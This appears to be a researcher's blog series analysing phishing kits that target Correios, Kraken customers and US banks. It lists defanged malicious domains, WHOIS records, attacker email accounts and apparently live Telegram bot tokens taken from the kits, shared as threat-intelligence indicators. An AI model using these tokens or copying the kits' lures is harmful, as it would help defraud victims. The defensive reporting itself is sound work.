Correios phishing kit

In the last few weeks I have noticed that attacks on Correios are constant. I have studied the matter a bit: it is the Brazilian state company that manages shipments and payments related to them.

The scam is always the same, attackers write to users saying that a shipment is blocked and that a small payment is needed to unblock it. What is interesting about this attack is that the user by entering the CPF (Cadastro de Pessoas Físicas) gets his data displayed on the page and this certainly appears to the user as something reliable.

The domain used for the attack is cpf-pendente[.]co[.]ua and it was registered few hours ago.

Domain ID:1161463_COUA-DRS
Domain Name:CPF-PENDENTE.CO.UA
Created On:22-Apr-2025 17:22:07 UTC
Last Updated On:22-Apr-2025 17:25:15 UTC
Expiration Date:22-Apr-2026 17:22:07 UTC
Sponsoring Registrar:NIC.UA LLC (nic-mnt-cunic)
Status:ok
Registrant ID:NICUA2550498EZZN-CUNIC
Registrant Name:<not disclosed>
Registrant Organization:<not disclosed>
Registrant Street1:<not disclosed>
Registrant Street2:<not disclosed>
Registrant Street3:<not disclosed>
Registrant City:<not disclosed>
Registrant State/Province:<not disclosed>
Registrant Postal Code:<not disclosed>
Registrant Country:<not disclosed>
Registrant Phone:<not disclosed>
Registrant Fax:<not disclosed>
Registrant Email:<not disclosed>
Admin ID:NICUA2550498EZZN-CUNIC
Admin Name:<not disclosed>
Admin Organization:<not disclosed>
Admin Street1:<not disclosed>
Admin Street2:<not disclosed>
Admin Street3:<not disclosed>
Admin City:<not disclosed>
Admin State/Province:<not disclosed>
Admin Postal Code:<not disclosed>
Admin Country:<not disclosed>
Admin Phone:<not disclosed>
Admin Fax:<not disclosed>
Admin Email:<not disclosed>
Billing ID:NICUA2550498EZZN-CUNIC
Billing Name:<not disclosed>
Billing Organization:<not disclosed>
Billing Street1:<not disclosed>
Billing Street2:<not disclosed>
Billing Street3:<not disclosed>
Billing City:<not disclosed>
Billing State/Province:<not disclosed>
Billing Postal Code:<not disclosed>
Billing Country:<not disclosed>
Billing Phone:<not disclosed>
Billing Fax:<not disclosed>
Billing Email:<not disclosed>
Tech ID:NICUA2550498EZZN-CUNIC
Tech Name:<not disclosed>
Tech Organization:<not disclosed>
Tech Street1:<not disclosed>
Tech Street2:<not disclosed>
Tech Street3:<not disclosed>
Tech City:<not disclosed>
Tech State/Province:<not disclosed>
Tech Postal Code:<not disclosed>
Tech Country:<not disclosed>
Tech Phone:<not disclosed>
Tech Fax:<not disclosed>
Tech Email:<not disclosed>
Name Server:VERA.NS.CLOUDFLARE.COM
Name Server:LLOYD.NS.CLOUDFLARE.COM

The first curiosity is that the archive is a RAR instead of a ZIP. Someone hoped to make life difficult for Matrix but I love writing code and this allows Matrix to open different types of archives, including obviously RAR 🙂

Aside from the type of archive, my curiosity about this kit was given by the functionality of extracting user data starting from the CPF. I do not know the Brazilian law but that from a simple number you can extract personal data seems unsafe to me.

The kit uses an external service to resolve the client data. This service I assume is part of the attack and probably uses another service in turn, perhaps legitimate or a leak from who knows where. This service is available at the domain anonimobusca[.]online. It was registered one week ago.

Domain Name: ANONIMOBUSCA.ONLINE
Registry Domain ID: D544101018-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2025-04-15T13:27:33.0Z
Creation Date: 2025-04-15T13:27:28.0Z
Registry Expiry Date: 2026-04-15T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: IGNAT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2025-04-23T07:20:24.0Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnicregistry.com/support/information/rdap <<<

The registration data available in this service is limited. Additional
data may be available at https://lookup.icann.org

The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnicregistry.com)

Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnicregistry.com/pub/whois_guidance.

To obtain the user information, the phishing kit, uses a specific resource exposed by the second domain

Another aspect is related to how payments are collected. The kit does not in fact collect itself he payment data. The user makes the payment using systems that manage transactions. The services used to perform the transactions are:

paguesafe[.]com
atlaspagamentos[.]com

The URLs used are:

hxxps://checkout[.]paguesafe[.]io/pl/mn7xXvjg2N
hxxps://checkout[.]atlaspagamentos[.]com/pl/RQ9Kz7XTf8

Both services have been active for a short time, they use cheap providers for domain management and have free certificates. In short, I would say that nothing seems to give trust to these services.

   Domain Name: PAGUESAFE.COM
   Registry Domain ID: 2805917900_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.rrpproxy.net
   Registrar URL: http://www.key-systems.net
   Updated Date: 2025-01-22T02:22:32Z
   Creation Date: 2023-08-14T19:17:29Z
   Registry Expiry Date: 2025-08-14T19:17:29Z
   Registrar: Key-Systems GmbH
   Registrar IANA ID: 269
   Registrar Abuse Contact Email: abuse@key-systems.net
   Registrar Abuse Contact Phone: +49.68949396850
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: NS1.DNS-PARKING.COM
   Name Server: NS2.DNS-PARKING.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-04-23T07:20:37Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: paguesafe.com
Registry Domain ID: 2805917900_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.rrpproxy.net
Registrar URL: https://www.hostinger.com/contacts
Updated Date: 2025-01-22T02:22:32Z
Creation Date: 2023-08-14T19:17:29Z
Registrar Registration Expiration Date: 2025-08-14T19:17:29Z
Registrar: Key-Systems GmbH
Registrar IANA ID: 269
Registrar Abuse Contact Email: abusereport@key-systems.net
Registrar Abuse Contact Phone: +49.68949396850
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: On behalf of paguesafe.com OWNER
Registrant Organization: c/o whoisproxy.com
Registrant Street: 604 Cameron Street
Registrant City: Alexandria
Registrant State/Province: VA
Registrant Postal Code: 22314
Registrant Country: US
Registrant Phone: +64.48319528
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org
Registry Admin ID: Not Available From Registry
Admin Name: On behalf of paguesafe.com ADMIN
Admin Organization: c/o whoisproxy.com
Admin Street: 604 Cameron Street
Admin City: Alexandria
Admin State/Province: VA
Admin Postal Code: 22314
Admin Country: US
Admin Phone: +64.48319528
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org
Registry Tech ID: Not Available From Registry
Tech Name: On behalf of paguesafe.com TECH
Tech Organization: c/o whoisproxy.com
Tech Street: 604 Cameron Street
Tech City: Alexandria
Tech State/Province: VA
Tech Postal Code: 22314
Tech Country: US
Tech Phone: +64.48319528
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org
Registry Billing ID: Not Available From Registry
Billing Name: On behalf of paguesafe.com BILLING
Billing Organization: c/o whoisproxy.com
Billing Street: 604 Cameron Street
Billing City: Alexandria
Billing State/Province: VA
Billing Postal Code: 22314
Billing Country: US
Billing Phone: +64.48319528
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: 20f3221829e93b3a03d0a4bba3bcdb0491e3ed52d42dd6bff0f8d15a0f6fc777@paguesafe.com.whoisproxy.org
Name Server: ns1.dns-parking.com
Name Server: ns2.dns-parking.com
DNSSEC: unsigned
Whoisprivacy: 1
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2025-04-23T07:20:56Z <<<

For more information on Whois status codes, please visit https://www.icann.org/epp

To contact the registered registrant please proceed to:
https://www.domain-contact.org

Please register your domains at; https://www.hostinger.com/contacts
This data is provided by
for information purposes, and to assist persons obtaining information
about or related to domain name registration records.
 does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
   unsolicited, commercial advertising or solicitations via E-mail
   (spam) or
2) enable high volume, automated, electronic processes that apply
   to this WHOIS server.
These terms may be changed without prior notice.
By submitting this query, you agree to abide by this policy.

   Domain Name: ATLASPAGAMENTOS.COM
   Registry Domain ID: 2936397696_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.godaddy.com
   Registrar URL: http://www.godaddy.com
   Updated Date: 2024-11-26T21:51:12Z
   Creation Date: 2024-11-22T20:48:06Z
   Registry Expiry Date: 2025-11-22T20:48:06Z
   Registrar: GoDaddy.com, LLC
   Registrar IANA ID: 146
   Registrar Abuse Contact Email: abuse@godaddy.com
   Registrar Abuse Contact Phone: 480-624-2505
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: ARYA.NS.CLOUDFLARE.COM
   Name Server: BRETT.NS.CLOUDFLARE.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-04-23T07:21:52Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: atlaspagamentos.com
Registry Domain ID: 2936397696_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2024-11-22T15:48:06Z
Creation Date: 2024-11-22T15:48:06Z
Registrar Registration Expiration Date: 2025-11-22T15:48:06Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 100 S. Mill Ave, Suite 1600
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85281
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: https://www.godaddy.com/whois/results.aspx?domain=atlaspagamentos.com&action=contactDomainOwner
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 100 S. Mill Ave, Suite 1600
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85281
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: https://www.godaddy.com/whois/results.aspx?domain=atlaspagamentos.com&action=contactDomainOwner
Name Server: ARYA.NS.CLOUDFLARE.COM
Name Server: BRETT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2025-04-23T07:22:01Z <<<
For more information on Whois status codes, please visit https://icann.org/epp

TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.

**NOTICE** This WHOIS server is being retired. Please use our RDAP service instead.

To this I would like to add that the two graphical interfaces are practically the same.

Being a hacker

Nothing annoys me more than hearing the term “hacker” used as a synonym for “criminal”. I can actually accept it from people who do something else in life. It really bothers me when this abuse comes from people who say they are cyber security professionals.

I understand that in recent years everyone has become cyber security experts. Those who were previously blockchain experts, before big data experts and even before one of the many trends that have plagued IT. In many cases, the place of many of these would have been a nice industrial fryer for chips in a fast food restaurant.

“I know that I know nothing”, having quoted Socrates, I can admit that I am not the right person to explain what a hacker is, so I report the Manifesto.

If you don’t work in IT and you don’t know it, it’s not serious.
If you work in IT and you don’t know it, it’s serious.
If you work in cyber security and you don’t know it, for me mayonnaise and ketchup 😉

Being a hacker means facing life with passion and living the passion without limits. This does not mean harming others. For this reason a hacker is not a criminal. He can be if he harms others, but in doing so he becomes a criminal and must be considered as such.

Another thing: let’s be serious, “ethical hacker” is funny, it smacks of an elderly “script kiddie”!

I deactivated my Facebook account

After many years as a Facebook user yesterday I deactivated my Facebook account. I also deleted my Instagram, but in fact I never used it. The people at Twitter had blocked my Twitter account, so now if you want to talk to me you have to send me an email or call me on the phone 🙂

I know it’s not a big deal, but several friends have been asking me why in the last few hours, so I decided to share this why here, where I can write freely.

I’ve always had a fairly active social life on Facebook, I liked sharing what I was doing and participating in what my friends were sharing. But my passion for social media passed when I realized that social media has become mainly a tool for revenge. Whoever has to say something stupid says it on social media. The real environment in which we live protects and regulates us, no one can say too much bullshit without being reprimanded. Social media, on the other hand, has become the megaphone of morons in too many cases.

Last month I tried deleting the app from my smartphone. It worked well, the usage time was reduced and it didn’t cost me any effort. Finally I could spend more time on the toilet with Nova Lectio.
The notification mechanism is evil, it needs to be managed, especially for young people who grew up with it and are convinced that it’s normal to always be available to others and, even worse, to a program that tries to sell you stuff or, even worse, to sell you to others.

After what happened in Romania, where a civilized state defended itself from a rigged outcome via social media. After seeing how the American government views Europe (and I am happy to be European). After seeing the support that social media gives to characters that I consider embarrassing for the human species. After all this, I thought it was better to take a step back.

I will continue to use LinkedIn because so far “mom Microsoft” is doing a great job and it seems to me that it continues to be a place where one can be at peace.

I’ve never kissed anyone’s ass, and I certainly won’t do it through someone else.

Business breakfast with fraud

Looking at what ends up in the Matrix network I noticed a kit that targets Kraken customers.

As usual, the victim is frightened with an alleged compromise of their account.

The interesting aspect of this kit is that instead of asking the victim to enter their wallet details, the application suggests the victim to schedule a phone meeting. The user is asked to leave their phone number and is even provided with an .ics file with the appointment details, so that the victim remembers not to make other commitments 😀

The user data is sent to a Telegram bot as usual.

Looking for updates received from bots we find several messages waiting to be read by the fraudster. Since the domain where we found the kit does not yet have the kit online, it means that there are other sites with the kit already in operation.

Searching Elastic for domains with “kraken” in their names that are managed by the same DNS server (dnspod.com) brought up several other domains including kraken-centre.com which of course has the kit already online.

Why aren’t criminals’ email accounts closed?

Free time is less and less, nevertheless I try to dedicate at least a couple of hours every week to the analysis of the Matrix evidence. I dedicate some time to the analysis of phishing kits and to the sharing of the email and Telegram token indicators on my public ioc repo: https://github.com/ecarlesi/ioc.git

From this analysis a spontaneous question arises: why do the same accounts continue to be active over time? Does no one notice that they are being used for illicit purposes?

The obvious answer might be that Telegram is based in Dubai, founded by a Russian, maybe preventing or mitigating fraud is not at the forefront of their minds. Maybe. Let’s say the same goes for Yandex, they are Russian. Maybe. What I don’t understand though is why they don’t block Gmail and Yahoo accounts either, just to name two non-Russian companies.

Let’s take the segdairo as gmail dot com account for example. I personally found it in 5 different attacks, the first one dating back to May 13, 2024.

Later I found it in other kits within which I identified other indicators:

hxxps://digitalbankingsonoraweb[.]online/verify/SONORA%20CU.zip contains the Telegram token 5453712056:AAE5M0Nnbcm0eanesMhIV62mNU_WgM20A6c
hxxps://dlgitaldove88system[.]online/FIRST%20FIFELITY%20BANK.zip contains the Telegram token 7223951606:AAHTkeSZ1UFauExPuwkzK_wfORFsldNFbnA
hxxps://digitalconnectfirstnow[.]online/FIRST%20UNITED%20BANK.zip contains the email account hakekelly07 at gmail dot com and the Telegram token 7103172103:AAFibon0scauwaJ6gnsY3vBfQ7e13IST9QY
hxxps://online-ctricbonline[.]cfd/cancel/login%20(1).zip contains the Telegram token 6318747656:AAFlcQchhlCb9DNkfpXvCEKXhSr0yINXgQc
hxxps://dashboardverfedconnect[.]online/VERMONT%20FCU.zip contains the Telegram token 7482950914:AAEupDhXYLKY_vvZHvwiCdgG_A2y4W5Jgn8

Not understanding why email accounts are blocked even when they are clearly involved in illicit activities, I tried to understand how to report a criminal email account. Searching on the internet I found some instructions from Google that talk about how to report an email received. However, I did not find how to report an email involved in illicit activities without having received any email from it in my Gmail account. I also found directions regarding Google Workspace accounts, which are very convenient, but this is not the case.

I finally found a link to the Internet Crime Complaint Center (ic3[.]gov). There is a form to report the event. It is now dinner time, given the length of the form, maybe I will do it after dinner.

Here I found something interesting: the Government explains how to recognize a legitimate Government domain, there is “.gov” and the padlock that indicates the use of https…

I would say not very well since every day there are thousands of new domains that meet these requirements 😀

Phishing against Kraken

At the end of a pretty busy day, I finally found a few minutes to check out the incoming notifications from Matrix. I noticed a kit that targets Kraken customers because their icon reminds me of the ghost from Pacman, and just today I got the vintage Pacman console 🙂

The domain used for the attack is krakeeen[.]top. It was registered three days ago and Matrix keep the monitoring active waiting for the kit. It arrives some hours ago. Thanks attacker 🙂

At the moment the only reports on this matter are those made by Matrix.

As usual, the kit is PHP based.

Every now and then someone tells me that my posts seem like I don’t love it! That’s not true, I really like PHP and often the code is badly written and therefore sucks.

I love PHP and its community!!!!!

As for the stolen credentials, the kit requires that they be sent to the email address hardeyholar47@gmail[.]com.

Of course I added it to the list that I hope you already know 🙂

Attack against Correios

This morning I came across a kit aimed at Brazilian taxpayers. The domain used for the attack is consultarencomeda[.]online

The attack is currently in its initial phase, the domain was registered a few hours ago and the kit was copied to the hosting. Matrix intercepted these two activities, analyzed the archive containing the kit and sent the notification to Urlscan. To date, no one reports this site as malicious.

The default page of the kit mimics a Hostinger landing page in an attempt to block crawlers.

Opening the kit we discover how it works. At the base there is always the attempt to put pressure on the user, here the payment of a fee is demanded.

Without wasting time on how the kit works, as always it is poorly written PHP code, I highlight the channels that are used for payment and sending notifications to the customer.

The transaction takes place through a service provided by the domain codetech-payment-fanpass[.]rancher[.]codefabrik[.]dev

This service has no internet presence, is not advertised nor have I been able to figure out who it is associated with.

Sending notifications is implemented by pushcut[.]io, of course this is a legitimate service and the presence of a key in the kit, I hope it can help the company to identify the abuse.

An update on the Matrix project

Since Matrix has had its own blog for some time now, I’ll just post the reference here. In this article I’ll tell you about my experience with Elasticsearch and how one of its instances became part of Matrix.

Lucene has finally arrived, thanks to Elastricsearch

Another source of malware

One of the features of Matrix is monitoring on some resources that are detected as suspicious. This monitoring is useful to identify threats like this one I am writing about. An hour ago Matrix reported the site file-share-transfer[.]com as “opendir”, this is because there was no content inside.

A few minutes ago however the component that monitors the resources already detected, notified an update. Matrix then ran a scan again and detected an active threat.

The site presents itself as a classic file remote drive that requires you to open a document. By clicking on the button, your local file browser (explorer or finder) opens, showing a well-presented artifact that is not very clear for an inexperienced user, interface.

At first glance, in fact, you might think that the document presented is a local document, while in fact it is a link to a well-disguised remote file.

By proceeding, a link file is downloaded locally that references a malware that is downloaded from Alibaba’s cloud.

This attack is done fairly well, nothing particularly advanced but overall it is very fluid and credible. Performed towards a reality with little expertise it certainly has a good chance of success.

This leads us to understand how it is necessary to improve security at the infrastructure level because an attack like this will hardly be discovered by an average user. In my opinion, a more stringent sandbox on the browser and a more precise analysis would be necessary. My Chrome during this analysis did not highlight anything, the same for Defender. There is still a lot of work to do to make everyone safe.

Script kiddie in action

Today I was analyzing some Matrix collected phishing kits and this struck me.

First of all for the continuous duplication of code, there are ten files with practically the same code with minor changes, he could have made a function… but unfortunately he is an idiot and so I come to the climax of the matter: the copyright on a redirect.

Also done badly because the variable is useless.

Such incompetent people are forced to steal because no one would give them a job in IT 😀